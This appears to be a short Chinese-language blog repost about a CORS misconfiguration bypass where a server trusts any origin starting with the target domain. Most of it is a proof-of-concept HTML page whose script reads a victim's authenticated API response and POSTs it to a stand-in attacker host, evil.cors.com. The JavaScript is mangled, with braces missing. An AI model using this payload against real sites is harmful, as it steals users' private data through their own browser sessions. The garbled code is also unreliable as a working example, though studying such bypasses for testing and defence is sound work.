跨域资源共享(CORS)-漏洞整理
Posted atesetenginner
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了跨域资源共享(CORS)-漏洞整理相关的知识,希望对你有一定的参考价值。
绕过 - 仅对域名校验
#POC #"Access-Control-Allow-Origin: https://xx.co & Access-Control-Allow- Credentials: true". #Origin: https://xx.co.evil.net, Access-Control-Allow-Origin: https://xx.co.evil.net. <html> <body> <button type=‘button‘ onclick=‘cors()‘>CORS</button> <p id=‘demo‘></p> <script> function cors() var xhttp = new XMLHttpRequest(); xhttp.onreadystatechange = function() if (this.readyState == 4 && this.status == 200) var a = this.responseText; document.getElementById("demo").innerHTML = a; xhttp.open("POST", "http://evil.cors.com", true); xhttp.withCredentials = true; console.log(a); xhttp.send("data="+a); ; xhttp.open("GET", "https://www.xx.co/api/v1/users/*******", true); xhttp.withCredentials = true; xhttp.send(); </script> </body> </html>
以上是关于跨域资源共享(CORS)-漏洞整理的主要内容,如果未能解决你的问题,请参考以下文章